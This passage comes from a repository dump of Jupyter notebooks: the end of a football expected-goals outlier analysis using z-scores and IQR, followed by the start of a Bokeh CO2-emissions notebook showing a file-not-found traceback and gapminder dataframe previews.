2.0).all(axis=1)]\ndf_xg[(np.abs(zscore(df_xg[['xpts_diff']])) > 3.0).all(axis=1)]","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"12 outliers in total detected with zscore. Poor Osasuna in 2016 - almost 30 not deserved goals.\n\nAs we can see from this data being in outlier space top does not yet make you win the season. But if you miss your opportunities or receive goals where you shouldn't and do that toooooo much - you deserve relegation. Losing and being average is much easier than winning."},{"metadata":{},"cell_type":"markdown","source":"## Interquartile Range (IQR)"},{"metadata":{},"cell_type":"markdown","source":"IQR - is the difference between the first quartile and third quartile of a set of data. This is one way to describe the spread of a set of data. \n\nA commonly used rule says that a data point is an outlier if it is more than 1.5 ⋅ IQR above the third quartile or below the first quartile. Said differently, low outliers are below Q1 − 1.5 ⋅ IQR and high outliers are above Q3 + 1.5 ⋅ IQR.\n\nLet's check it out."},{"metadata":{"trusted":true},"cell_type":"code","source":"# Trying different method of outliers detection\ndf_xg.describe()","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"# using Interquartile Range Method to identify outliers\n# xG_diff\niqr_xG = (df_xg.describe().loc['75%','xG_diff'] - df_xg.describe().loc['25%','xG_diff']) * 1.5\nupper_xG = df_xg.describe().loc['75%','xG_diff'] + iqr_xG\nlower_xG = df_xg.describe().loc['25%','xG_diff'] - iqr_xG\n\nprint('IQR for xG_diff: {:.2f}'.format(iqr_xG))\nprint('Upper border for xG_diff: {:.2f}'.format(upper_xG))\nprint('Lower border for xG_diff: {:.2f}'.format(lower_xG))\n\noutliers_xG = df_xg[(df_xg['xG_diff'] > upper_xG) | (df_xg['xG_diff'] < lower_xG)]\nprint('='*50)\n\n# xGA_diff\niqr_xGA = (df_xg.describe().loc['75%','xGA_diff'] - df_xg.describe().loc['25%','xGA_diff']) * 1.5\nupper_xGA = df_xg.describe().loc['75%','xGA_diff'] + iqr_xGA\nlower_xGA = df_xg.describe().loc['25%','xGA_diff'] - iqr_xGA\n\nprint('IQR for xGA_diff: {:.2f}'.format(iqr_xGA))\nprint('Upper border for xGA_diff: {:.2f}'.format(upper_xGA))\nprint('Lower border for xGA_diff: {:.2f}'.format(lower_xGA))\n\noutliers_xGA = df_xg[(df_xg['xGA_diff'] > upper_xGA) | (df_xg['xGA_diff'] < lower_xGA)]\nprint('='*50)\n\n# xpts_diff\niqr_xpts = (df_xg.describe().loc['75%','xpts_diff'] - df_xg.describe().loc['25%','xpts_diff']) * 1.5\nupper_xpts = df_xg.describe().loc['75%','xpts_diff'] + iqr_xpts\nlower_xpts = df_xg.describe().loc['25%','xpts_diff'] - iqr_xpts\n\nprint('IQR for xPTS_diff: {:.2f}'.format(iqr_xpts))\nprint('Upper border for xPTS_diff: {:.2f}'.format(upper_xpts))\nprint('Lower border for xPTS_diff: {:.2f}'.format(lower_xpts))\n\noutliers_xpts = df_xg[(df_xg['xpts_diff'] > upper_xpts) | (df_xg['xpts_diff'] < lower_xpts)]\nprint('='*50)\n\noutliers_full = pd.concat([outliers_xG, outliers_xGA, outliers_xpts])\noutliers_full = outliers_full.drop_duplicates()","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"# Adding ratings bottom to up to find looser in each league (different amount of teams in every league so I can't do just n-20)\nmax_position = df_xg.groupby('league')['position'].max()\ndf_xg['position_reverse'] = np.nan\noutliers_full['position_reverse'] = np.nan\n\nfor i, row in df_xg.iterrows():\n  df_xg.at[i, 'position_reverse'] = np.abs(row['position'] - max_position[row['league']])+1\n  \nfor i, row in outliers_full.iterrows():\n  outliers_full.at[i, 'position_reverse'] = np.abs(row['position'] - max_position[row['league']])+1","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"total_count = df_xg[(df_xg['position'] <= 4) | (df_xg['position_reverse'] <= 3)].count()[0]\noutlier_count = outliers_full[(outliers_full['position'] <= 4) | (outliers_full['position_reverse'] <= 3)].count()[0]\noutlier_prob = outlier_count / total_count\nprint('Probability of outlier in top or bottom of the final table: {:.2%}'.format(outlier_prob))","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"So we can say that it is very probable that every year in one of 6 leagues there will be a team that gets a ticket to Champions League or Europa Legue with the help of luck on top of their great skills or there is a looser that gets to the second division, because they cannot convert their moments."},{"metadata":{"trusted":true},"cell_type":"code","source":"# 1-3 outliers among all leagues in a year\ndata = pd.DataFrame(outliers_full.groupby('league')['year'].count()).reset_index()\ndata = data.rename(index=int, columns={'year': 'outliers'})\nsns.barplot(x='league', y='outliers', data=data)\n# no outliers in Bundesliga","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"Our winners and losers with brilliant performance and brilliant underperformance"},{"metadata":{"trusted":true},"cell_type":"code","source":"top_bottom = outliers_full[(outliers_full['position'] <= 4) | (outliers_full['position_reverse'] <= 3)].sort_values(by='league')\ntop_bottom","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"# Let's get back to our list of teams that suddenly got into top. Was that because of unbeliavable mix of luck and skill?\not = [x for x  in outlier_teams if x in top_bottom['team'].drop_duplicates().tolist()]\not\n# The answer is absolutely no. They just played well during 1 season. Sometimes that happen.","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"# Conclusions"},{"metadata":{},"cell_type":"markdown","source":"Football is a low-scoring game and one goal can change the entire picture of the game and even end results. That's why long term analysis gives you better picture of the situation. \n\nWith the introduction of xG metric (and others that derive from this) now we can really evaluate the performance of the team on a long run and understand the difference between top teams, middle class teams and absolute outsiders. \n\nxG bring new arguments into discussions around football what makes it even more interesting. And at the same time the game doesn't loose this factor of uncertainty and possibility of crazy things happening. Actually now, these crazy things have a chance to be explained.\n\nIn the end we have found that it is almost 100% chance that something weird will happen in one of the leagues. It is just question of time how epic that will be."}],"metadata":{"kernelspec":{"display_name":"Python 3","language":"python","name":"python3"},"language_info":{"name":"python","version":"3.6.4","mimetype":"text/x-python","codemirror_mode":{"name":"ipython","version":3},"pygments_lexer":"ipython3","nbconvert_exporter":"python","file_extension":".py"}},"nbformat":4,"nbformat_minor":1}


--------------------------------------------------------------------------------
/co2-bokeh.ipynb:
--------------------------------------------------------------------------------
  1 | {
  2 |  "cells": [
  3 |   {
  4 |    "cell_type": "code",
  5 |    "execution_count": 2,
  6 |    "metadata": {},
  7 |    "outputs": [],
  8 |    "source": [
  9 |     "import pandas as pd\n",
 10 |     "\n",
 11 |     "from bokeh.io import output_file, show, curdoc\n",
 12 |     "from bokeh.plotting import figure\n",
 13 |     "from bokeh.models import HoverTool, ColumnDataSource, CategoricalColorMapper, Slider\n",
 14 |     "from bokeh.palettes import Spectral6\n",
 15 |     "from bokeh.layouts import widgetbox, row"
 16 |    ]
 17 |   },
 18 |   {
 19 |    "cell_type": "code",
 20 |    "execution_count": 5,
 21 |    "metadata": {},
 22 |    "outputs": [
 23 |     {
 24 |      "ename": "FileNotFoundError",
 25 |      "evalue": "File b'/notebooks-for-articles/data/co2_emissions_tonnes_per_person.csv' does not exist",
 26 |      "traceback": [
 27 |       "\u001b[1;31m---------------------------------------------------------------------------\u001b[0m",
 28 |       "\u001b[1;31mFileNotFoundError\u001b[0m                         Traceback (most recent call last)",
 29 |       "\u001b[1;32m<ipython-input-5-c519b31b2d6a>\u001b[0m in \u001b[0;36m<module>\u001b[1;34m()\u001b[0m\n\u001b[0;32m      1\u001b[0m \u001b[1;31m# Data cleaning and preparation\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m----> 2\u001b[1;33m \u001b[0mdata\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mpd\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mread_csv\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;34m'/notebooks-for-articles/data/co2_emissions_tonnes_per_person.csv'\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m      3\u001b[0m \u001b[0mdata\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mhead\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
 30 |       "\u001b[1;32mC:\\Anaconda\\lib\\site-packages\\pandas\\io\\parsers.py\u001b[0m in \u001b[0;36mparser_f\u001b[1;34m(filepath_or_buffer, sep, delimiter, header, names, index_col, usecols, squeeze, prefix, mangle_dupe_cols, dtype, engine, converters, true_values, false_values, skipinitialspace, skiprows, nrows, na_values, keep_default_na, na_filter, verbose, skip_blank_lines, parse_dates, infer_datetime_format, keep_date_col, date_parser, dayfirst, iterator, chunksize, compression, thousands, decimal, lineterminator, quotechar, quoting, escapechar, comment, encoding, dialect, tupleize_cols, error_bad_lines, warn_bad_lines, skipfooter, skip_footer, doublequote, delim_whitespace, as_recarray, compact_ints, use_unsigned, low_memory, buffer_lines, memory_map, float_precision)\u001b[0m\n\u001b[0;32m    653\u001b[0m                     skip_blank_lines=skip_blank_lines)\n\u001b[0;32m    654\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 655\u001b[1;33m         \u001b[1;32mreturn\u001b[0m \u001b[0m_read\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mfilepath_or_buffer\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mkwds\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m    656\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m    657\u001b[0m     \u001b[0mparser_f\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__name__\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mname\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
 31 |       "\u001b[1;32mC:\\Anaconda\\lib\\site-packages\\pandas\\io\\parsers.py\u001b[0m in \u001b[0;36m_read\u001b[1;34m(filepath_or_buffer, kwds)\u001b[0m\n\u001b[0;32m    403\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m    404\u001b[0m     \u001b[1;31m# Create the parser.\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 405\u001b[1;33m     \u001b[0mparser\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mTextFileReader\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mfilepath_or_buffer\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;33m**\u001b[0m\u001b[0mkwds\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m    406\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m    407\u001b[0m     \u001b[1;32mif\u001b[0m \u001b[0mchunksize\u001b[0m \u001b[1;32mor\u001b[0m \u001b[0miterator\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
 32 |       "\u001b[1;32mC:\\Anaconda\\lib\\site-packages\\pandas\\io\\parsers.py\u001b[0m in \u001b[0;36m__init__\u001b[1;34m(self, f, engine, **kwds)\u001b[0m\n\u001b[0;32m    762\u001b[0m             \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0moptions\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;34m'has_index_names'\u001b[0m\u001b[1;33m]\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mkwds\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;34m'has_index_names'\u001b[0m\u001b[1;33m]\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m    763\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 764\u001b[1;33m         \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_make_engine\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mengine\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m    765\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m    766\u001b[0m     \u001b[1;32mdef\u001b[0m \u001b[0mclose\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
 33 |       "\u001b[1;32mC:\\Anaconda\\lib\\site-packages\\pandas\\io\\parsers.py\u001b[0m in \u001b[0;36m_make_engine\u001b[1;34m(self, engine)\u001b[0m\n\u001b[0;32m    983\u001b[0m     \u001b[1;32mdef\u001b[0m \u001b[0m_make_engine\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mengine\u001b[0m\u001b[1;33m=\u001b[0m\u001b[1;34m'c'\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m    984\u001b[0m         \u001b[1;32mif\u001b[0m \u001b[0mengine\u001b[0m \u001b[1;33m==\u001b[0m \u001b[1;34m'c'\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 985\u001b[1;33m             \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_engine\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mCParserWrapper\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mf\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;33m**\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0moptions\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m    986\u001b[0m         \u001b[1;32melse\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m    987\u001b[0m             \u001b[1;32mif\u001b[0m \u001b[0mengine\u001b[0m \u001b[1;33m==\u001b[0m \u001b[1;34m'python'\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
 34 |       "\u001b[1;32mC:\\Anaconda\\lib\\site-packages\\pandas\\io\\parsers.py\u001b[0m in \u001b[0;36m__init__\u001b[1;34m(self, src, **kwds)\u001b[0m\n\u001b[0;32m   1603\u001b[0m         \u001b[0mkwds\u001b[0m\u001b[1;33m[\u001b[0m\u001b[1;34m'allow_leading_cols'\u001b[0m\u001b[1;33m]\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mindex_col\u001b[0m \u001b[1;32mis\u001b[0m \u001b[1;32mnot\u001b[0m \u001b[1;32mFalse\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m   1604\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 1605\u001b[1;33m         \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_reader\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mparsers\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mTextReader\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0msrc\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;33m**\u001b[0m\u001b[0mkwds\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m   1606\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m   1607\u001b[0m         \u001b[1;31m# XXX\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n",
 35 |       "\u001b[1;32mpandas/_libs/parsers.pyx\u001b[0m in \u001b[0;36mpandas._libs.parsers.TextReader.__cinit__ (pandas\\_libs\\parsers.c:4209)\u001b[1;34m()\u001b[0m\n",
 36 |       "\u001b[1;32mpandas/_libs/parsers.pyx\u001b[0m in \u001b[0;36mpandas._libs.parsers.TextReader._setup_parser_source (pandas\\_libs\\parsers.c:8873)\u001b[1;34m()\u001b[0m\n",
 37 |       "\u001b[1;31mFileNotFoundError\u001b[0m: File b'/notebooks-for-articles/data/co2_emissions_tonnes_per_person.csv' does not exist"
 38 |      ],
 39 |      "output_type": "error"
 40 |     }
 41 |    ],
 42 |    "source": [
 43 |     "# Data cleaning and preparation\n",
 44 |     "data = pd.read_csv('/notebooks-for-articles/data/co2_emissions_tonnes_per_person.csv')\n",
 45 |     "data.head()"
 46 |    ]
 47 |   },
 48 |   {
 49 |    "cell_type": "code",
 50 |    "execution_count": 4,
 51 |    "metadata": {},
 52 |    "outputs": [
 53 |     {
 54 |      "data": {
 55 |       "text/html": [
 56 |        "<div>\n",
 57 |        "<style>\n",
 58 |        "    .dataframe thead tr:only-child th {\n",
 59 |        "        text-align: right;\n",
 60 |        "    }\n",
 61 |        "\n",
 62 |        "    .dataframe thead th {\n",
 63 |        "        text-align: left;\n",
 64 |        "    }\n",
 65 |        "\n",
 66 |        "    .dataframe tbody tr th {\n",
 67 |        "        vertical-align: top;\n",
 68 |        "    }\n",
 69 |        "</style>\n",
 70 |        "<table border=\"1\" class=\"dataframe\">\n",
 71 |        "  <thead>\n",
 72 |        "    <tr style=\"text-align: right;\">\n",
 73 |        "      <th></th>\n",
 74 |        "      <th>Country</th>\n",
 75 |        "      <th>Year</th>\n",
 76 |        "      <th>fertility</th>\n",
 77 |        "      <th>life</th>\n",
 78 |        "      <th>population</th>\n",
 79 |        "      <th>child_mortality</th>\n",
 80 |        "      <th>gdp</th>\n",
 81 |        "      <th>region</th>\n",
 82 |        "    </tr>\n",
 83 |        "  </thead>\n",
 84 |        "  <tbody>\n",
 85 |        "    <tr>\n",
 86 |        "      <th>0</th>\n",
 87 |        "      <td>Afghanistan</td>\n",
 88 |        "      <td>1964</td>\n",
 89 |        "      <td>7.671</td>\n",
 90 |        "      <td>33.639</td>\n",
 91 |        "      <td>10474903.0</td>\n",
 92 |        "      <td>339.7</td>\n",
 93 |        "      <td>1182.0</td>\n",
 94 |        "      <td>South Asia</td>\n",
 95 |        "    </tr>\n",
 96 |        "    <tr>\n",
 97 |        "      <th>1</th>\n",
 98 |        "      <td>Afghanistan</td>\n",
 99 |        "      <td>1965</td>\n",
100 |        "      <td>7.671</td>\n",
101 |        "      <td>34.152</td>\n",
102 |        "      <td>10697983.0</td>\n",
103 |        "      <td>334.1</td>\n",
104 |        "      <td>1182.0</td>\n",
105 |        "      <td>South Asia</td>\n",
106 |        "    </tr>\n",
107 |        "    <tr>\n",
108 |        "      <th>2</th>\n",
109 |        "      <td>Afghanistan</td>\n",
110 |        "      <td>1966</td>\n",
111 |        "      <td>7.671</td>\n",
112 |        "      <td>34.662</td>\n",
113 |        "      <td>10927724.0</td>\n",
114 |        "      <td>328.7</td>\n",
115 |        "      <td>1168.0</td>\n",
116 |        "      <td>South Asia</td>\n",
117 |        "    </tr>\n",
118 |        "    <tr>\n",
119 |        "      <th>3</th>\n",
120 |        "      <td>Afghanistan</td>\n",
121 |        "      <td>1967</td>\n",
122 |        "      <td>7.671</td>\n",
123 |        "      <td>35.170</td>\n",
124 |        "      <td>11163656.0</td>\n",
125 |        "      <td>323.3</td>\n",
126 |        "      <td>1173.0</td>\n",
127 |        "      <td>South Asia</td>\n",
128 |        "    </tr>\n",
129 |        "    <tr>\n",
130 |        "      <th>4</th>\n",
131 |        "      <td>Afghanistan</td>\n",
132 |        "      <td>1968</td>\n",
133 |        "      <td>7.671</td>\n",
134 |        "      <td>35.674</td>\n",
135 |        "      <td>11411022.0</td>\n",
136 |        "      <td>318.1</td>\n",
137 |        "      <td>1187.0</td>\n",
138 |        "      <td>South Asia</td>\n",
139 |        "    </tr>\n",
140 |        "  </tbody>\n",
141 |        "</table>\n",
142 |        "</div>"
143 |       ],
144 |       "text/plain": [
145 |        "       Country  Year  fertility    life  population  child_mortality     gdp  \\\n",
146 |        "0  Afghanistan  1964      7.671  33.639  10474903.0            339.7  1182.0   \n",
147 |        "1  Afghanistan  1965      7.671  34.152  10697983.0            334.1  1182.0   \n",
148 |        "2  Afghanistan  1966      7.671  34.662  10927724.0            328.7  1168.0   \n",
149 |        "3  Afghanistan  1967      7.671  35.170  11163656.0            323.3  1173.0   \n",
150 |        "4  Afghanistan  1968      7.671  35.674  11411022.0            318.1  1187.0   \n",
151 |        "\n",
152 |        "       region  \n",
153 |        "0  South Asia  \n",
154 |        "1  South Asia  \n",
155 |        "2  South Asia  \n",
156 |        "3  South Asia  \n",
157 |        "4  South Asia  "
158 |       ]
159 |      },
160 |      "execution_count": 4,
161 |      "metadata": {},
162 |      "output_type": "execute_result"
163 |     }
164 |    ],
165 |    "source": [
166 |     "gapminder = pd.read_csv('data/gapminder_tidy.csv')\n",
167 |     "gapminder.head()"
168 |    ]
169 |   },
170 |   {
171 |    "cell_type": "code",
172 |    "execution_count": 21,
173 |    "metadata": {},
174 |    "outputs": [
175 |     {
176 |      "data": {
177 |       "text/html": [
178 |        "<div>\n",
179 |        "<style>\n",
180 |        "    .dataframe thead tr:only-child th {\n",
181 |        "        text-align: right;\n",
182 |        "    }\n",
183 |        "\n",
184 |        "    .dataframe thead th {\n",
185 |        "        text-align: left;\n",
186 |        "    }\n",
187 |        "\n",
188 |        "    .dataframe tbody tr th {\n",
189 |        "        vertical-align: top;\n",
190 |        "    }\n",
191 |        "</style>\n",
192 |        "<table border=\"1\" class=\"dataframe\">\n",
193 |        "  <thead>\n",
194 |        "    <tr style=\"text-align: right;\">\n",
195 |        "      <th></th>\n",
196 |        "      <th>country</th>\n",
197 |        "      <th>1800</th>\n",
198 |        "      <th>1801</th>\n",
199 |        "      <th>1802</th>\n",
200 |        "      <th>1803</th>\n",
201 |        "      <th>1804</th>\n",
202 |        "      <th>1805</th>\n",
203 |        "      <th>1806</th>\n",
204 |        "      <th>1807</th>\n",
205 |        "      <th>1808</th>\n",
206 |        "      <th>...</th>\n",
207 |        "      <th>2006</th>\n",
208 |        "      <th>2007</th>\n",
209 |        "      <th>2008</th>\n",
210 |        "      <th>2009</th>\n",
211 |        "      <th>2010</th>\n",
212 |        "      <th>2011</th>\n",
213 |        "      <th>2012</th>\n",
214 |        "      <th>2013</th>\n",
215 |        "      <th>2014</th>\n",
216 |        "      <th>region</th>\n",
217 |        "    </tr>\n",
218 |        "  </thead>\n",
219 |        "  <tbody>\n",
220 |        "    <tr>\n",
221 |        "      <th>0</th>\n",
222 |        "      <td>Afghanistan</td>\n",
223 |        "      <td>NaN</td>\n",
224 |        "      <td>NaN</td>\n",
225 |        "      <td>NaN</td>\n",
226 |        "      <td>NaN</td>\n",
227 |        "      <td>NaN</td>\n",
228 |        "      <td>NaN</td>\n",
229 |        "      <td>NaN</td>\n",
230 |        "      <td>NaN</td>\n",
231 |        "      <td>NaN</td>\n",
232 |        "      <td>...</td>\n",
233 |        "      <td>0.0637</td>\n",
234 |        "      <td>0.0854</td>\n",
235 |        "      <td>0.154</td>\n",
236 |        "      <td>0.242</td>\n",
237 |        "      <td>0.294</td>\n",
238 |        "      <td>0.412</td>\n",
239 |        "      <td>0.35</td>\n",
240 |        "      <td>0.316</td>\n",
241 |        "      <td>0.299</td>\n",
242 |        "      <td>South Asia</td>\n",
243 |        "    </tr>\n",
244 |        "    <tr>\n",
245 |        "      <th>1</th>\n",
246 |        "      <td>Albania</td>\n",
247 |        "      <td>NaN</td>\n",
248 |        "      <td>NaN</td>\n",
249 |        "      <td>NaN</td>\n",
250 |        "      <td>NaN</td>\n",
251 |        "      <td>NaN</td>\n",
252 |        "      <td>NaN</td>\n",
253 |        "      <td>NaN</td>\n",
254 |        "      <td>NaN</td>\n",
255 |        "      <td>NaN</td>\n",
256 |        "      <td>...</td>\n",
257 |        "      <td>1.2800</td>\n",
258 |        "      <td>1.3000</td>\n",
259 |        "      <td>1.460</td>\n",
260 |        "      <td>1.480</td>\n",
261 |        "      <td>1.560</td>\n",
262 |        "      <td>1.790</td>\n",
263 |        "      <td>1.68</td>\n",
264 |        "      <td>1.730</td>\n",
265 |        "      <td>1.960</td>\n",
266 |        "      <td>Europe &amp; Central Asia</td>\n",
267 |        "    </tr>\n",
268 |        "    <tr>\n",
269 |        "      <th>2</th>\n",
270 |        "      <td>Algeria</td>\n",
271 |        "      <td>NaN</td>\n",
272 |        "      <td>NaN</td>\n",
273 |        "      <td>NaN</td>\n",
274 |        "      <td>NaN</td>\n",
275 |        "      <td>NaN</td>\n",
276 |        "      <td>NaN</td>\n",
277 |        "      <td>NaN</td>\n",
278 |        "      <td>NaN</td>\n",
279 |        "      <td>NaN</td>\n",
280 |        "      <td>...</td>\n",
281 |        "      <td>2.9900</td>\n",
282 |        "      <td>3.1900</td>\n",
283 |        "      <td>3.160</td>\n",
284 |        "      <td>3.420</td>\n",
285 |        "      <td>3.300</td>\n",
286 |        "      <td>3.290</td>\n",
287 |        "      <td>3.46</td>\n",
288 |        "      <td>3.510</td>\n",
289 |        "      <td>3.720</td>\n",
290 |        "      <td>Middle East &amp; North Africa</td>\n",
291 |        "    </tr>\n",
292 |        "    <tr>\n",
293 |        "      <th>3</th>\n",
294 |        "      <td>Angola</td>\n",
295 |        "      <td>NaN</td>\n",
296 |        "      <td>NaN</td>\n",
297 |        "      <td>NaN</td>\n",
298 |        "      <td>NaN</td>\n",
299 |        "      <td>NaN</td>\n",
300 |        "      <td>NaN</td>\n",
301 |        "      <td>NaN</td>\n",
302 |        "      <td>NaN</td>\n",
303 |        "      <td>NaN</td>\n",
304 |        "      <td>...</td>\n",
305 |        "      <td>1.1000</td>\n",
306 |        "      <td>1.2000</td>\n",
307 |        "      <td>1.180</td>\n",
308 |        "      <td>1.230</td>\n",
309 |        "      <td>1.240</td>\n",
310 |        "      <td>1.250</td>\n",
311 |        "      <td>1.33</td>\n",
312 |        "      <td>1.250</td>\n",
313 |        "      <td>1.290</td>\n",
314 |        "      <td>Sub-Saharan Africa</td>\n",
315 |        "    </tr>\n",
316 |        "    <tr>\n",
317 |        "      <th>4</th>\n",
318 |        "      <td>Antigua and Barbuda</td>\n",
319 |        "      <td>NaN</td>\n",
320 |        "      <td>NaN</td>\n",
321 |        "      <td>NaN</td>\n",
322 |        "      <td>NaN</td>\n",
323 |        "      <td>NaN</td>\n",
324 |        "      <td>NaN</td>\n",
325 |        "      <td>NaN</td>\n",
326 |        "      <td>NaN</td>\n",
327 |        "      <td>NaN</td>\n",
328 |        "      <td>...</td>\n",
329 |        "      <td>4.9100</td>\n",
330 |        "      <td>5.1400</td>\n",
331 |        "      <td>5.190</td>\n",
332 |        "      <td>5.450</td>\n",
333 |        "      <td>5.540</td>\n",
334 |        "      <td>5.360</td>\n",
335 |        "      <td>5.42</td>\n",
336 |        "      <td>5.360</td>\n",
337 |        "      <td>5.380</td>\n",
338 |        "      <td>America</td>\n",
339 |        "    </tr>\n",
340 |        "  </tbody>\n",
341 |        "</table>\n",
342 |        "<p>5 rows × 217 columns</p>\n",
343 |        "</div>"
344 |       ],
345 |       "text/plain": [
346 |        "               country  1800  1801  1802  1803  1804  1805  1806  1807  1808  \\\n",
347 |        "0          Afghanistan   NaN   NaN   NaN   NaN   NaN   NaN   NaN   NaN   NaN   \n",
348 |        "1              Albania   NaN   NaN   NaN   NaN   NaN   NaN   NaN   NaN   NaN   \n",
349 |        "2              Algeria   NaN   NaN   NaN   NaN   NaN   NaN   NaN   NaN   NaN   \n",
350 |        "3               Angola   NaN   NaN   NaN   NaN   NaN   NaN   NaN   NaN   NaN   \n",
351 |        "4  Antigua and Barbuda   NaN   NaN   NaN   NaN   NaN   NaN   NaN   NaN   NaN   \n",
352 |        "\n",
353 |        "              ...                2006    2007   2008   2009   2010   2011  \\\n",
354 |        "0             ...              0.0637  0.0854  0.154  0.242  0.294  0.412   \n",
355 |        "1             ...              1.2800  1.3000  1.460  1.480  1.560  1.790   \n",
356 |        "2             ...              2.9900  3.1900  3.160  3.420  3.300  3.290   \n",
357 |        "3             ...              1.1000  1.2000  1.180  1.230  1.240  1.250   \n",
358 |        "4             ...              4.9100  5.1400  5.190  5.450  5.540  5.360   \n",
359 |        "\n",
360 |        "   2012   2013   2014                      region  \n",
361 |        "0  0.35  0.316  0.299                  South Asia  \n",
362 |        "1  1.68  1.730  1.960       Europe & Central Asia  \n",
363 |        "2  3.46  3.510  3.720  Middle East & North Africa  \n",
364 |        "3  1.33  1.250  1.290          Sub-Saharan Africa  \n",
365 |        "4  5.42  5.360  5.380                     America  \n",
366 |        "\n",
367 |        "[5 rows x 217 columns]"
368 |       ]
369 |      },
370 |      "execution_count": 21,
371 |      "metadata": {},
372 |      "output_type": "execute_result"
373 |     }
374 |    ],
375 |    "source": [
376 |     "df = gapminder[['Country', 'region']].drop_duplicates()\n",
377 |     "data_with_regions = pd.merge(data, df, left_on='country', right_on='Country', how='inner')\n",
378 |     "data_with_regions = data_with_regions.drop('Country', axis='columns')\n",
379 |     "\n",
380 |     "data_with_regions.head()"
381 |    ]
382 |   },
383 |   {
384 |    "cell_type": "code",
385 |    "execution_count": 22,
386 |    "metadata": {},
387 |    "outputs": [
388 |     {
389 |      "data": {
390 |       "text/html": [
391 |        "<div>\n",
392 |        "<style>\n",
393 |        "    .dataframe thead tr:only-child th {\n",
394 |        "        text-align: right;\n",
395 |        "    }\n",
396 |        "\n",
